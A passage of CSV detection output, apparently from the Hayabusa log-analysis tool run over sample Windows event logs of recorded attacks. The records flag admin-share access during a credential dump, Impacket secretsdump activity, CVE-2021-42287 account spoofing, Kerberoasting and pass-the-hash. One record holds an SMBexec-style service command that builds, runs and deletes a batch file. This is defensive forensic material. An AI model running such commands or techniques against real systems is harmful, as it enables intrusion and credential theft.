\\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.957 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.989 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.989 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.989 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.020 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.020 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.020 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.036 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.036 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.036 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.067 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.067 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.067 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.084 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.086 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.086 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.086 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.105 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.123 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.154 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.154 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 12:01:18.896 +00:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx +2021-12-12 17:57:17.006 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.272 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.277 +00:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.278 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.325 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.372 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.375 +00:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.473 +00:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.473 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.497 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.518 +00:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 08:21:30.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.829 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.845 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 12:55:45.250 +00:00,rootdc1.offsec.lan,7045,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx +2021-12-13 12:55:45.250 +00:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x2cff42b44,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx +2021-12-14 14:42:48.182 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.182 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.182 +00:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.690 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.690 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - 